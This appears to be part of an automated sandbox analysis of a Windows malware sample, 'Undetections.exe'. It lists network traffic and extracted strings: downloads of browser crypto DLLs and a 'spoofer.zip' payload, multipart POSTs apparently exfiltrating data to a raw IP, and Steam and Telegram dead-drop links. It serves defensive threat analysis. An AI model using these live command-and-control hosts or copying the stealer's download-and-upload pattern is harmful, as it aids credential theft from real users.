                          Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.217.212.139Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.217.212.139Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.217.212.139Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEBGHCBAEGDHIDGCBAECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.217.212.139Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BFIIEHJDBKJKECBFHDGHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.217.212.139Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAAFBAKECAEGCBFIEGDGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.217.212.139Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BGIJDGCAEBFIIECAKFHIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.217.212.139Content-Length: 453Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EGCBAFCFIJJJECBGIIJKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.217.212.139Content-Length: 127537Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JKKEHJDHJKFIECAAKFIJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.217.212.139Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHCBAAAFHJDHJJKEBGHIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.217.212.139Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.212.139
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00404420 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,lstrlenA,lstrlenA,HttpSendRequestA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,4_2_00404420
                          Source: global trafficHTTP traffic detected: GET /STLprograms/NEW/z-Closing.txt HTTP/1.1Host: universalbeure.usite.proConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /STLprograms/NEW/hwid.txt HTTP/1.1Host: universalbeure.usite.pro
                          Source: global trafficHTTP traffic detected: GET /STLprograms/NEW/qwxisix/hwids.txt HTTP/1.1Host: universalbeure.usite.pro
                          Source: global trafficHTTP traffic detected: GET /STLprograms/NEW/qwxisix/Undetections/BuildLink.txt HTTP/1.1Host: universalbeure.usite.pro
                          Source: global trafficHTTP traffic detected: GET /STLprograms/NEW/qwxisix/Undetections/BuildName.txt HTTP/1.1Host: universalbeure.usite.pro
                          Source: global trafficHTTP traffic detected: GET /STLprograms/NEW/qwxisix/Undetections/BuildZipName.txt HTTP/1.1Host: universalbeure.usite.pro
                          Source: global trafficHTTP traffic detected: GET /spoofer.zip HTTP/1.1Host: ashjghas.ucoz.netConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /profiles/76561199662282318 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.217.212.139Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /sqln.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.217.212.139Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.217.212.139Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.217.212.139Cache-Control: no-cache
                          Source: Undetections.exe, 00000000.00000002.4082392228.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: CLIENT_VERSIONthttp://gdata.youtube.com/feeds/api/videos/{0}?v=2&alt=jsonDFailed to get youtube video data: Lhttp://vimeo.com/api/v2/video/{0}.json@Failed to get vimeo video data: ork Manager.<br><br> <b>LICENSE MODULE</b><br> The license module enables you to work without interruptions. Issues with the module can be caused by:<br><br> (i) <i>Framework Manager is not installed</i><br>(ii) <i>HDD formatting</i><br>(iii) <i>OS reintallation</i>,<br>(iv) <i>Siticone Files Deletion</i>, or<br>(v) <i>Any other issues</i>.<br><br> For assistance, please contact our support centre at: <i>support@siticoneframework.com</i>PMissing Manager or the Module is corrupt4Download Framework Manager4Contact Our Support CentreHmailto:support@siticoneframework.comDhttps://www.siticoneframework.com/ equals www.youtube.com (Youtube)
                          Source: unknownDNS traffic detected: queries for: universalbeure.usite.pro
                          Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAKEGIJEHJDGDHJKJKKJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.217.212.139Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002C4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ashjghas.ucoz.net
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002C4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ashjghas.ucoz.netd
                          Source: Undetections.exe, 00000000.00000002.4104859280.0000000005390000.00000004.08000000.00040000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082954500.0000000002941000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003E21000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003B97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
                          Source: Undetections.exe, 00000000.00000002.4104859280.0000000005390000.00000004.08000000.00040000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082954500.0000000002941000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003E21000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003B97000.00000004.00000800.00020000.00000000.sdmp, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                          Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                          Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                          Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                          Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                          Source: Undetections.exe, 00000000.00000002.4309060736.00000000103F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                          Source: Undetections.exe, 00000000.00000002.4104859280.0000000005390000.00000004.08000000.00040000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082954500.0000000002941000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003E21000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003B97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
                          Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                          Source: Undetections.exe, 00000000.00000002.4104859280.0000000005390000.00000004.08000000.00040000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082954500.0000000002941000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003E21000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003B97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
                          Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                          Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                          Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                          Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                          Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                          Source: Undetections.exe, 00000000.00000002.4104859280.0000000005390000.00000004.08000000.00040000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082954500.0000000002941000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003E21000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003B97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
                          Source: Undetections.exe, 00000000.00000002.4104859280.0000000005390000.00000004.08000000.00040000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082954500.0000000002941000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003E21000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003B97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
                          Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                          Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                          Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002AD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/FontAwesome.Sharp;component/fonts/X
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002AD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/FontAwesome.Sharp;component/fonts/Xd
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002AD4000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082954500.0000000002A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/FontAwesome.Sharp;component/fonts/fa-brands-400.ttf
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002AD4000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082954500.0000000002A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/FontAwesome.Sharp;component/fonts/fa-brands-400.ttfd
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/FontAwesome.Sharp;component/fonts/fa-regular-400.ttf
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/FontAwesome.Sharp;component/fonts/fa-regular-400.ttfd
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002AD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/FontAwesome.Sharp;component/fonts/fa-solid-900.ttf
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002AD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/FontAwesome.Sharp;component/fonts/fa-solid-900.ttfd
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/fonts/fa-brands-400.ttf
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/fonts/fa-brands-400.ttfd
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/fonts/fa-regular-400.ttf
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/fonts/fa-regular-400.ttfd
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002AD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/fonts/fa-solid-900.ttf
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002AD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/fonts/fa-solid-900.ttfd
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/fonts/fa-brands-400.ttf
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/fonts/fa-brands-400.ttfd
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/fonts/fa-regular-400.ttf
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/fonts/fa-regular-400.ttfd
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002AD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/fonts/fa-solid-900.ttf
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002AD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/fonts/fa-solid-900.ttfd
                          Source: Undetections.exe, 00000000.00000002.4082954500.00000000029FA000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082954500.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082392228.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gdata.youtube.com/feeds/api/videos/
                          Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.drString found in binary or memory: http://ocsp.digicert.com0
                          Source: Undetections.exe, 00000000.00000002.4104859280.0000000005390000.00000004.08000000.00040000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082954500.0000000002941000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003E21000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003B97000.00000004.00000800.00020000.00000000.sdmp, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.drString found in binary or memory: http://ocsp.digicert.com0A
                          Source: Undetections.exe, 00000000.00000002.4104859280.0000000005390000.00000004.08000000.00040000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082954500.0000000002941000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003E21000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003B97000.00000004.00000800.00020000.00000000.sdmp, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.drString found in binary or memory: http://ocsp.digicert.com0C
                          Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.drString found in binary or memory: http://ocsp.digicert.com0N
                          Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.drString found in binary or memory: http://ocsp.digicert.com0X
                          Source: Undetections.exe, 00000000.00000002.4082954500.00000000029FA000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003941000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4107042182.0000000005BF0000.00000004.08000000.00040000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003A61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.awesome.incremented/wpf/xaml/fontawesome.sharp
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002941000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002BCD000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082954500.0000000002C4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://universalbeure.usite.pro
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002BCD000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082954500.0000000002C4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://universalbeure.usite.prod
                          Source: Undetections.exe, 00000000.00000002.4082954500.00000000029FA000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082954500.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082392228.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vimeo.com/api/v2/video/
                          Source: Undetections.exe, 00000000.00000002.4108901419.0000000007072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drString found in binary or memory: https://store.steampowered.com/stats/
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                          Source: KKEHIEBKJKFIEBGDGDAAECGHDH.4.drString found in binary or memory: https://support.mozilla.org
                          Source: KKEHIEBKJKFIEBGDGDAAECGHDH.4.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                          Source: KKEHIEBKJKFIEBGDGDAAECGHDH.4.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, DGCAAFBF.4.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                          Source: DGCAAFBF.4.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                          Source: RegAsm.exe, RegAsm.exe, 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, DGCAAFBF.4.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                          Source: DGCAAFBF.4.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe
                          Source: spoofer.exe, 00000002.00000002.1756042307.0000000004175000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/t8jmhl
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002BEF000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082954500.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082954500.0000000002C4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://universalbeure.usite.pro
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002BEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://universalbeure.usite.pro/STLprograms/NEW/hwid.txt
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002BEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://universalbeure.usite.pro/STLprograms/NEW/hwid.txtd
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002C4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://universalbeure.usite.pro/STLprograms/NEW/qwxisix/Undetections/BuildLink.txtd
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002BEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://universalbeure.usite.pro/STLprograms/NEW/qwxisix/Undetections/BuildLink.txtt-kq
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002C4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://universalbeure.usite.pro/STLprograms/NEW/qwxisix/Undetections/BuildName.txtd
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002BEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://universalbeure.usite.pro/STLprograms/NEW/qwxisix/Undetections/BuildName.txtt-kq
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002C4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://universalbeure.usite.pro/STLprograms/NEW/qwxisix/Undetections/BuildZipName.txtd
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002BEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://universalbeure.usite.pro/STLprograms/NEW/qwxisix/Undetections/BuildZipName.txtt-kq
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002C4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://universalbeure.usite.pro/STLprograms/NEW/qwxisix/hwids.txt
